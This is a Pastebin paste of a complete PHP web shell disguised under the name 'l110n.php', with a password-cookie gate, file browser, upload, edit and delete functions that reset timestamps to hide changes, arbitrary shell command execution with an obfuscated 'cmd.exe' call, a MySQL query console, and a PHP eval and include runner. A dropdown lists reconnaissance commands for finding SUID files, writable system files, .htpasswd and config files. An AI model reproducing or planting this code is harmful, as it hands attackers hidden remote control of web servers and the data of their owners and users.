PalmaSolutions

l110n.php

May 11th, 2018
305
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 22.21 KB | None | 0 0
  1. <?php
  2. #------------------Security------------------#
  3. $name_c = "checkIndentity";
  4. function get_c($name_c){
  5.     foreach($_COOKIE as $key=>$value) {
  6.         if  ($key == $name_c)
  7.             return $c = $value;
  8.           else
  9.             return false;
  10.         }
  11. }
  12. function is_cookie ($search_cookie) {
  13.     foreach($_COOKIE as $key=>$value) {
  14.         if  ($value == $search_cookie)
  15.             return true;
  16.           else
  17.             return false;
  18.         }
  19.     }
  20.  
  21.     if (md5($_REQUEST['p']) == "1b0ca22694b8eb1303af4d535bc15df7" || is_cookie(get_c($name_c))){
  22.         if(!is_cookie(get_c($name_c))) setcookie("checkIndentity",md5($_REQUEST['p']));
  23. #------------------END Security------------------#
  24. ##################################################
  25. #------------------Private Class------------------#
  26. class browseDir {
  27. var $pwd;
  28. var $newLocation;
  29. var $lastOpenFile;
  30.  
  31. function browseDir(){
  32.     $d=$this->pwd = getcwd();
  33.     $this->changeDir($d);
  34. }
  35.  
  36. function upload($ifupload){
  37.     if(isset($ifupload)){
  38.        $uploadfile = $_SESSION['lastchg'].'/'.basename($_FILES['uploadfile']['name']);
  39.     if (! move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile)){
  40.             print "Unable to move ".
  41.             $_FILES['uploadfile']['tmp_name']." file to<br />$uploadfile<br />";
  42.         }
  43.         if (file_exists($uploadfile)) @chmod($uploadfile, 0777);
  44.   }
  45. }
  46.  
  47. function changeDir ($dir){
  48.             $dir=trim($dir);
  49.             @chdir($this->pwd);
  50.         if (!file_exists($dir)){print "$dir: No such file or directory<br />\n";return;}
  51.         if (!@chdir($dir)) {print "$dir: Failed<br />\n";return;}
  52.     return $this->pwd = getcwd();
  53. }
  54.  
  55. function getDirList($newLocation='',$viewperms=''){
  56.           $handle = '';
  57.    if(!empty($viewperms) && $viewperms == 'viewFullperms') $_SESSION['vfp'] = 'full'; //view perms
  58.           $self = $_SERVER['PHP_SELF'];
  59.    if (empty($this->newLocation) && $this->newLocation == ''){
  60.           $this->newLocation=$_SESSION['lastchg'];
  61.           $handle = @opendir($this->pwd);
  62.     if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';}
  63.           $dirs = array();
  64.           $files = array();
  65.       while (false !== ($file = @readdir($handle))) {
  66.             if ($file != ".") {
  67.                 if (is_dir($file)) $dirs[] = $file;
  68.                   else $files[] = $file;
  69.             }
  70.         }
  71.    }
  72.   if (!empty($this->newLocation) && $this->newLocation != ''){
  73.         if(isset($_SESSION['lastchg'])) {
  74.             $this->pwd = &$_SESSION['lastchg'];
  75.             $_SESSION['lastchg'] = $this->changeDir($this->newLocation);
  76.         }
  77.         if(empty($_SESSION['lastchg'])) $_SESSION['lastchg'] = $this->changeDir($this->newLocation);
  78.      }
  79.  
  80.          $handle = @opendir($this->pwd);
  81.     if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';}
  82.          $dirs = array();
  83.          $files = array();
  84.       while (false !== ($file = @readdir($handle))) {
  85.             if ($file != ".") {
  86.                 if (is_dir($file)){
  87.                     $dirs[] = $file;
  88.                 } else {
  89.                     $files[] = $file;
  90.                 }
  91.             }
  92.         }
  93.     @closedir($handle);
  94.     natcasesort($files);
  95.     natcasesort($dirs);
  96. print '<tr><td valign="top">';
  97. print '<i>'.getcwd().'</i><br/>';
  98. print '<hr><br/>';
  99.         foreach ($dirs as $d){
  100.             print '<a href="?command='.urlencode($d).'">'.htmlentities($d)."</a>&nbsp;&nbsp;&nbsp;&nbsp;".$this->_view_perms($d,$_SESSION['vfp'])."<br />";
  101.         }
  102.             print '<hr/>';
  103.         foreach ($files as $f){
  104.             if (is_readable($f))
  105.                  print '<a target="_blank" href="'.$_SERVER['PHP_SELF'].'/'.urlencode($f).'?getfile='. urlencode($f).'">'.htmlentities($f).'</a>'."&nbsp;&nbsp;&nbsp;&nbsp;".$this->_view_perms($d,$_SESSION['vfp']);
  106.               else print htmlentities($f);
  107.  
  108.             print "<br />\n";
  109.         }
  110.         print "<br />\n";
  111.         print "<br />\n";
  112.     if (is_writeable(getcwd())){
  113.          print '<form enctype="multipart/form-data" action="'.$self.'" method="post">';
  114.          print '<tr><td><input type="file" name="uploadfile" />';
  115.          print '<input type="submit" name="uploading" value="Upload" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="submit" name="perms" value="viewFullperms" /></td></tr>';
  116.          print '</form>';
  117.     }
  118.         print "</td><td>";
  119.   }
  120.  
  121. function showFile ($fname,$escapeOutput = true){
  122.             if(empty($this->pwd) && $this->pwd=='') $this->pwd = '.';
  123.                 $fullpath = $_SESSION['lastchg']."/$fname"; $ctype = 'text/plain';
  124.             if (!  is_readable($fullpath)){print "Unable to read $fullpath";return;}
  125.             if ($ctype == 'text/html' && $escapeOutput) header("Content-type: text/plain\r\n\r\n");
  126.               else header( "Content-type: $ctype\r\n\r\n");
  127.             if($fh=@fopen($fullpath,'r')){
  128.                 $code=@fread($fh,filesize($fullpath));
  129.                 @fclose($fh);
  130.                 echo $code;
  131.             }else readfile($fullpath);
  132. }
  133.  
  134. function send_file($dist_name='') {
  135.     ob_end_clean();
  136.     /*$e = split("/", strrev($dist_name), 2);
  137.     $name = strrev($e[0]);
  138.     $distination = strrev($e[1]);
  139.     $path = $distination."/".$name;*/
  140.     if(empty($this->pwd) && $this->pwd == '') $this->pwd = '.';
  141.         $path = $this->pwd."/$dist_name";
  142. if (!is_file($path) or connection_status()!=0) return(FALSE);
  143.     header("Cache-Control: no-store, no-cache, must-revalidate");
  144.     header("Cache-Control: post-check=0, pre-check=0", false);
  145.     header("Pragma: no-cache");
  146.     header("Expires: ".gmdate("D, d M Y H:i:s", mktime(date("H")+2, date("i"), date("s"), date("m"), date("d"), date("Y")))." GMT");
  147.     header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  148.     header("Content-Type: application/octet-stream");
  149.     header("Content-Length: ".(string)(filesize($path)));
  150.     header("Content-Disposition: inline; filename=".str_replace(" ","",$name));
  151.     header("Content-Transfer-Encoding: binary\n");
  152. if ($file = fopen($path, 'rb')) {
  153.     while(!feof($file) and (connection_status()==0)) {
  154.     print(fread($file, 1024*8));
  155.     flush();
  156.     }
  157.     fclose($file);
  158.     }
  159.     return((connection_status()==0) and !connection_aborted());
  160. }
  161.  
  162. function shh_curPageURL() {
  163.  global $SLASHSTR;
  164.  $pageURL = 'http';
  165.  //if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
  166.  $pageURL .= "://";
  167.  if ($_SERVER["SERVER_PORT"] != "80") {
  168.   $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  169.  } else {
  170.   $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  171.  }
  172.  if(!strstr($pageURL, $SLASHSTR)){
  173.   if(strpos($pageURL, '?')){$pageURL.="&$SLASHSTR";}else{$pageURL.="?$SLASHSTR";}
  174.  }
  175.  return $pageURL;
  176.  }
  177.  
  178. function print_a( $TheArray ){
  179.     echo "<table border=1>\n";
  180.     $Keys = array_keys( $TheArray );
  181.     foreach( $Keys as $OneKey ){
  182.       echo "<tr>\n";
  183.       echo "<td bgcolor='#727450'>";
  184.       echo "<B>" . $OneKey . "</B>";
  185.       echo "</td>\n";
  186.       echo "<td bgcolor='#C4C2A6'>";
  187.         if ( is_array($TheArray[$OneKey]) )
  188.           $this->print_a($TheArray[$OneKey]);
  189.         else
  190.           echo $TheArray[$OneKey];
  191.       echo "</td>\n";
  192.  
  193.       echo "</tr>\n";
  194.     }
  195.     echo "</table>\n";
  196.   }
  197.  
  198. function read_write_file($f,$rw='read',$contents='') {
  199.   global $CURFILE;
  200.   $file_mtime = @filemtime($f);
  201.   $file_atime = @fileatime($f);
  202.   $dir_mtime = @filemtime(@dirname($f));
  203.   $dir_atime = @fileatime(@dirname($f));
  204.   if($rw=='read'){
  205.   if ($file_h = @fopen($f, "rb")) {
  206.     $contents = @fread($file_h, filesize($f)); @fclose($file_h);
  207.     if ($file_mtime) @touch($f, $file_mtime, $file_atime);
  208.     if ($dir_mtime) @touch(@dirname($f), $dir_mtime, $dir_atime);
  209.     return $contents;
  210.   } else {
  211.     return false;
  212.   }
  213.   }elseif($rw=='write'){
  214.     if ($file_h = @fopen($f, "wb")) {
  215.         @fwrite($file_h, $contents); @fclose($file_h);
  216.     if ($file_mtime) @touch($f, $file_mtime, $file_atime);
  217.     if ($dir_mtime) @touch(@dirname($f), $dir_mtime, $dir_atime);
  218.     return true;
  219.   } else {
  220.     return false;
  221.   }
  222.   }else return false;
  223. }
  224.  
  225. function FileEdit($ifSubmit,$filename,$contents){
  226.  $filename = $_SESSION['lastchg']."/".$filename;
  227. if($ifSubmit == "Open"){
  228.     if(file_exists($filename)){
  229.         $_SESSION['lastOpenFile'] = $filename;
  230.         return $filecontents = $this->read_write_file($filename);
  231.          if(!$filecontents){//SafeMode Hack PHP 4.4.2 and 5.1.2
  232.             $tymczas=$_SESSION['lastchg']."/";
  233.             $temp=tempnam($tymczas, "cx");
  234.             if(copy("compress.zlib://".$filename, $temp)){
  235.               return $filecontents = $this->read_write_file($temp);
  236.             }else echo $status = "Some error.. Try again";
  237.          }
  238.     }else   $status = "File dosen't exist!";
  239. }else if($ifSubmit == "Delete"){
  240.     if(file_exists($filename)){
  241.         if(unlink($filename))
  242.             $status = "Deleted sucessfully!";
  243.         else
  244.             $status = "Can't delete!";
  245.     }
  246.     else $status = "File doesn't exist";
  247. }else if($ifSubmit == "Save"){
  248.        $filecontents = stripslashes(html_entity_decode($contents));
  249.        //if($_SESSION['lastOpenFile'] != '') $this->read_write_file($_SESSION['lastOpenFile'], "write", $filecontents);
  250.        $this->read_write_file($filename, "write", $filecontents);
  251. }else if($ifSubmit == "Reset"){
  252.     $filename='';
  253.     $filecontents='';
  254.     $_SESSION['lastOpenFile'] = '';
  255.     $_SESSION['vfp'] = 'short';
  256.     $_SESSION['lastchg'] = '.';
  257.   }
  258.  }
  259.  function select_populator($selectName,$value_array, $current_value, $onchange=''){
  260.          $html = "";
  261. $html = "<select id=\"$selectName\" name=\"$selectName\" onchange=\"$onchange\">";
  262.          foreach($value_array as $key=>$value){
  263.             $html .= "<option value=\"".$value."\"";
  264.             if($current_value == $key)
  265.                $html .= " selected";
  266.             $html .= ">".$key."</option>\n";
  267.             }
  268. $html .= "</select>";
  269.          echo ($html);
  270.          }
  271. function serverInfo(){
  272.     $phpscript = $_SERVER['SCRIPT_NAME'];
  273.     if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on"){
  274.         $safemode = TRUE;
  275.         echo "SafeMode: ".$hsafemode = "<font color=red>ON (secure)</font><br/>";
  276.     }else {
  277.         $safemode = FALSE;
  278.         echo "SafeMode: ".$hsafemode = "<font color=green>OFF (not secure)</font><br/>";
  279.     }
  280.  
  281.     $v = @ini_get("open_basedir");
  282.     if ($v or strtolower($v) == "on") {
  283.         $openbasedir = TRUE;
  284.         echo "OpenInBaseDir: ". $hopenbasedir = "<font color=red>".$v."</font><br/>";
  285.     }else {
  286.         $openbasedir = FALSE;
  287.         echo "OpenInBaseDir: ". $hopenbasedir = "<font color=green>OFF (not secure)</font><br/>";
  288. }
  289.     $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); preg_match("@.*\)@",$DISP_SERVER_SOFTWARE,$m); $servinf = $m[0];
  290.     echo "ApacheServerInfo: <font color=green>".$servinf."</font><br/>";
  291.     echo "Disable functions : ";
  292.     if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font><br/>";}else{echo "<font color=red>$df</font><br/>";}
  293.     echo "PHP Info: <a href=$phpscript?act=phpinfo target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a><br />";
  294. }
  295. function view_perms($mode)
  296. {
  297.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  298.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  299.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  300.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  301.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  302.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  303.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  304.  else {$type = "?";}
  305.  
  306.  $owner["read"] = ($mode & 00400)?"r":"-";
  307.  $owner["write"] = ($mode & 00200)?"w":"-";
  308.  $owner["execute"] = ($mode & 00100)?"x":"-";
  309.  $group["read"] = ($mode & 00040)?"r":"-";
  310.  $group["write"] = ($mode & 00020)?"w":"-";
  311.  $group["execute"] = ($mode & 00010)?"x":"-";
  312.  $world["read"] = ($mode & 00004)?"r":"-";
  313.  $world["write"] = ($mode & 00002)? "w":"-";
  314.  $world["execute"] = ($mode & 00001)?"x":"-";
  315.  
  316.  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  317.  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  318.  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  319.  
  320.  return $type.join("",$owner).join("",$group).join("",$world);
  321. }
  322.  
  323. function view_perms_color($o)
  324. {
  325.  if (!is_readable($o)) {return "<font color=red>".$this->view_perms(fileperms($o))."</font>";}
  326.  elseif (!is_writable($o)) {return "<font color=white>".$this->view_perms(fileperms($o))."</font>";}
  327.  else {return "<font color=green>".$this->view_perms(fileperms($o))."</font>";}
  328. }
  329. function _view_perms($d,$vfp){
  330.       $wdt='';
  331.   if (is_writable($d)){
  332.      $wd = TRUE;
  333.      if($vfp=='full') return $wdt = "<b><font color=green>".$this->view_perms(fileperms($d))."</font></b>";
  334.        else return $wdt = "<font color=green>[ ok ]</font>";
  335.   }else{
  336.      $wd = FALSE;
  337.     if($vfp=='full') return $wdt = "<b>".$this->view_perms_color($d)."</b>";
  338.        else return $wdt = "<font color=red>[ Read-Only ]</font>";
  339.  }
  340. }
  341. }
  342.  
  343. #------------------END Private Class------------------#
  344. #######################################################
  345. #------------------Define Variables------------------#
  346. $SLASHSTR='sht=%22';
  347. $act = $_GET['act'];
  348. $viewperms='';if(isset($_REQUEST["perms"])){$viewperms=trim($_REQUEST["perms"]);}
  349. $_execfuncs='';if(isset($_REQUEST["exec_funcs"])){$_execfuncs=trim($_REQUEST["exec_funcs"]);}
  350. $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','Wscript.Shell'=>'wscript') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
  351. $nixcommands=array("LynxVersion"=>"cat /proc/version","loggedInUsers"=>"w","IsCurl Installed"=>"which curl","Is writable etc"=>"find /etc/ -type f -perm -o+w 2> /dev/null","cpu info"=>"cat /proc/version /proc/cpuinfo","kernel ver."=>"uname -a","user w/o pass"=>"cut -d: -f1,2,3 /etc/passwd | grep ::","find all suid files"=>"find / -type f -perm -04000 -ls", "find suid files in current dir"=>"find . -type f -perm -04000 -ls", "find all sgid files"=>"find / -type f -perm -02000 -ls", "find all writable folders and files"=>"find / -perm -2 -ls","find all writable folders and files in current dir"=>"find . -perm -2 -ls" ,"find config.inc.php files"=>"find / -type f -name config.inc.php", "find all .htpasswd files"=>"find / -type f -name .htpasswd","show opened ports"=>"netstat -an | grep -i listen");
  352. $contents='';if(isset($_REQUEST["contents"])){$contents=trim($_REQUEST["contents"]);}
  353. $submit='';if(isset($_REQUEST["submit"])){$submit=trim($_REQUEST["submit"]);}
  354. $filename='';if(isset($_REQUEST["filename"]) && $_REQUEST["filename"] != ''){$filename = trim($_REQUEST["filename"]);}
  355. $isupload='';if($_REQUEST['uploading'] != '' && $_REQUEST['uploading'] == 'Upload'){$isupload=$_REQUEST['uploading'];}
  356. $openFile = '';if(isset($_REQUEST['getfile'])){$openFile=trim($_REQUEST['getfile']);}
  357. $shhptr='';if(isset($_REQUEST['shhptr'])){$shhptr=trim($_REQUEST['shhptr']);}   //  print_r($_REQUEST);
  358. $_SESSION['button'] = $shhptr;$page = $_SESSION['button'];
  359. $newLocation='';if(isset($_REQUEST['command'])){$newLocation=trim($_REQUEST['command']);}
  360. $cmd='';if(isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);}
  361. $shhcmd='';if(isset($_REQUEST['shhcmd'])){$shhcmd=trim($_REQUEST['shhcmd']);}
  362. $shhqry='';if(isset($_REQUEST['shhqry'])){$shhqry=trim($_REQUEST['shhqry']);}
  363. $sdbhst='';if(isset($_REQUEST['sdbhst'])){$sdbhst=trim($_REQUEST['sdbhst']);}
  364. $sdbusr='';if(isset($_REQUEST['sdbusr'])){$sdbusr=trim($_REQUEST['sdbusr']);}
  365. $sdbpsw='';if(isset($_REQUEST['sdbpsw'])){$sdbpsw=trim($_REQUEST['sdbpsw']);}
  366. $sdbsch='';if(isset($_REQUEST['sdbsch'])){$sdbsch=trim($_REQUEST['sdbsch']);}
  367. $shhcod='';if(isset($_REQUEST['shhcod'])){$shhcod=trim($_REQUEST['shhcod']);}
  368. $shhx='no';if(isset($_REQUEST['shhx'])){$shhx=trim($_REQUEST['shhx']);}
  369. $shhfnm='';if(isset($_REQUEST['shhfnm'])){$shhfnm=trim($_REQUEST['shhfnm']);}
  370. $slashtest=false;if(isset($_REQUEST['sht'])){$slashtest=trim($_REQUEST['sht']);}
  371. if(($slashtest!=false)&&($slashtest!='')){if($slashtest==='\"'){
  372. $shhcod = stripslashes($shhcod);
  373. $shhcmd = stripslashes($shhcmd);
  374. $shhqry = stripslashes($shhqry);
  375. }}
  376. #------------------END Define Variables------------------#
  377. ##########################################################
  378. print_r($_SESSION['lastchg']);
  379.         if(empty($_SESSION['lastchg']) || $_SESSION['lastchg'] == ''){
  380.         $browser = new browseDir();
  381.         session_start();
  382.         }
  383.         if($openFile!='') {$browser->showFile($openFile);exit;}
  384. ?>
  385. <html>
  386. <head>
  387. <SCRIPT language="JavaScript">
  388. function submitform(num){
  389.   var num;
  390.   document.theshll.shhptr.value = num;
  391.   document.theshll.submit();
  392. }
  393. function selcurr()
  394. {
  395. var mylist=document.getElementById("nixcmd");
  396. document.getElementById("nixcomm").value=mylist.options[mylist.selectedIndex].value;
  397. }
  398. </SCRIPT>
  399. <style type="text/css">
  400. input{color:#2EFE2E;background-color:black;margin:3px;}
  401. textarea{border-color:white;color:#2EFE2E;background-color:black;margin:3px;}
  402. body{color:white;background-color:black;}
  403. a{color:white;}
  404. td{border-color:white;color:#2EFE2E;background-color:black;margin:1px;}
  405. th{color:green;}
  406. </style>
  407. </head>
  408. <body>
  409. <? if($shhptr == 0 || $shhptr == ''){$browser->newLocation = $newLocation; $f_edit = $browser->FileEdit($submit,$filename,$contents);?>
  410. <form name="theshll" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
  411. <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
  412. <input type="button" name="1" value="SQL" onmousedown="submitform(1);" />
  413. <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" /><br/>
  414. <table border="1" width="26%" align="left" >
  415. <tr><td><?$browser->serverInfo();?></td></tr>
  416. <tr><th>CurrentDirectoryListing</th>
  417. </form>
  418. <?if($isupload != '' && !empty($isupload))$browser->upload($isupload);
  419.     $browser->getDirList($_SESSION['lastchg'],$viewperms);?></table>
  420. <table border="1">
  421. <form action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
  422. <?php
  423. echo '<tr><td><textarea rows="24" name="contents" wrap="hard" cols="100">';
  424.         if(($shhptr=='')&&($cmd!='')){
  425.         if ($_execfuncs=="system") {
  426.             system($cmd);
  427.         } elseif ($_execfuncs=="passthru") {
  428.             if(passthru($cmd, $out)){
  429.                 echo htmlentities(implode("\n",$out));
  430.             }
  431.         } elseif ($_execfuncs=="exec") {
  432.             $result = exec($cmd);
  433.             echo $result;
  434.         } elseif ($_execfuncs=="shell_exec") {
  435.             $result=shell_exec($cmd);
  436.             echo $result;
  437.         } elseif ($_execfuncs=="popen") {
  438.             $pp = popen($cmd, 'r');
  439.             $read = fread($pp, 2096);
  440.             echo $read;
  441.             pclose($pp);
  442.         } elseif ($_execfuncs=="wscript") {
  443.             $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
  444.             $exec = $wsh->exec ("cm"."d.e"."xe /c ".$cmd."");
  445.             $stdout = $exec->StdOut();
  446.             $stroutput = $stdout->ReadAll();
  447.             echo $stroutput;
  448.         } else {
  449.             system($cmd);
  450.         }
  451.     }
  452.         if($submit == 'Open') echo $f_edit;
  453. echo '</textarea></td></tr>';
  454. ?>
  455. <tr><td><input name="filename" type="text" value="<?echo $filename;?>" size="20">
  456. <input type="submit" name="submit" value="Open">
  457. <input type="submit" name="submit" value="Save">
  458. <input type="submit" name="submit" value="Delete">
  459. <input type="submit" name="submit" value="Reset">
  460. <?$browser->select_populator('exec_funcs',$execfuncs,'passthru');?><input align="left" type="text" name="cmd" id="nixcomm" size="30"/><input type="submit" value="EXECUTE"/></td></tr>
  461. <tr><td><b>'NIX CommandQuickLunch</b>&nbsp;&nbsp;&nbsp;&nbsp;<?$browser->select_populator('nixcmd',$nixcommands,'','selcurr()');?></td></tr>
  462. </form>
  463. </table>
  464. <?if($act == 'phpinfo'){
  465.     ob_start();
  466.     eval(phpinfo());
  467.     $_eval=ob_get_contents();
  468.     ob_end_clean();
  469.     echo $_eval;
  470.   }}?>
  471.  
  472. <?if(($page=='1')){?>
  473. <form name="theshll" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
  474. <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
  475. <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" />
  476. <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" />
  477. <div style="width: 600px;">
  478. <div style="float:left;">
  479. <input type="text" name="sdbhst" size="20" value="<?php echo $sdbhst; ?>" />.::Host:. <br />
  480. <input type="text" name="sdbsch" size="20" value="<?php echo $sdbsch; ?>" />.::DB:.</div>
  481. <div style="margin-left:20px;float:left;">
  482. <input type="text" name="sdbusr" size="20" value="<?php echo $sdbusr; ?>" />.::User:.<br />
  483. <input type="text" name="sdbpsw" size="20" value="<?php echo $sdbpsw; ?>" />.::Pass:.</div>
  484. <input type="text" name="shhqry" size="80" value="<?php echo $shhqry; ?>" />
  485. <input type="submit" value="QUERY" /></form>
  486. <?php
  487.   echo "<table>";
  488.   if(($shhptr=='1')&&($shhqry!='')){
  489.     if ($mysql = @mysql_connect($sdbhst, $sdbusr, $sdbpsw)){
  490.       if(@mysql_select_db($sdbsch)) {
  491.         if($res = @mysql_query($shhqry)){
  492.           if($row = mysql_fetch_assoc($res)){
  493.             while($row = mysql_fetch_assoc($res)){
  494.               $arr[] = $row;
  495.             }
  496.            $browser->print_a($arr);
  497.           }
  498.         } else echo "mysql query error: ".mysql_error()."\n";
  499.       } else echo "mysql select error: ".mysql_error()."\n";
  500.       @mysql_close($mysql);
  501.     } else echo "mysql connect error: ".mysql_error()."\n";
  502.   }
  503.   echo "</table>";
  504. }
  505. if(($page=='2')){
  506. ?>
  507. <form name="theshll" action="<?php echo $browser->shh_curPageURL(); ?>" method="POST">
  508. <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
  509. <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" />
  510. <input type="button" name="2" value="SQL" onmousedown="submitform(1);" /><br/>
  511. <input type="text" name="shhfnm" size="40" value="<?php echo $shhfnm; ?>" />
  512. <input type="submit" name="shhx" value="SAVE AS" />
  513. <input type="submit" name="shhx" value="INCLUDE/RUN" /><br />
  514. <input type="submit" name="shhx" value="EVALUATE" /><br />
  515. <textarea name="shhcod" wrap="off" rows="15" cols="65" >
  516. <?php echo $shhcod;?>
  517. </textarea>
  518. </form>
  519. <?php
  520.   echo "<div id=\"reslt\">";
  521.   switch($shhx){
  522.   case 'EVALUATE':
  523.     if($shhcod!=''){
  524.         ob_start();
  525.         eval($shhcod);
  526.         $eval=ob_get_contents();
  527.         ob_end_clean();
  528.     } else {
  529.         ob_start();
  530.         echo "Enter PHP code!";
  531.         $eval=ob_get_contents();
  532.         ob_end_clean();
  533.         }
  534.         break;
  535.   case 'SAVE AS':
  536.     if($shhfnm!=''){
  537.       $f = @fopen($shhfnm, 'w');
  538.       if($f){
  539.         if(strpos($shhcod, '<?php')===false){
  540.           $shhcodz = "<?php\n".$shhcod."\n".'?'.'>';
  541.         } else $shhcodz = $shhcod;
  542.         fwrite($f, $shhcodz);
  543.         fclose($f);
  544.         echo "Saved.";
  545.       } else echo "Cannot write file!\n";
  546.     } else echo "Enter file name!\n";
  547.     break;
  548.   case 'INCLUDE/RUN':
  549.     if($shhfnm!=''){
  550.       if (!@include($shhfnm)){
  551.         echo "Include error!";
  552.       };
  553.     } else echo "Enter file name!\n";
  554.     break;
  555.   }
  556. if(!empty($eval) && $eval != ''){
  557.   echo '<table align="left" border="0" >';
  558.   echo '<th align="center">EVAL OUTPUT:</th>';
  559.   echo '</table><br/>';
  560.   echo '<br/>';
  561.   echo '<table align="left" border="1" width="48%" height="30%">';
  562.   echo '<tr><td align="center">'.$eval.'</td></tr>';
  563.   echo '</table>';
  564.  }
  565. }
  566. ?>
  567. <th ></td>
  568. </body></html>
  569. <?}?>
Advertisement
Add Comment
Please, Sign In to add comment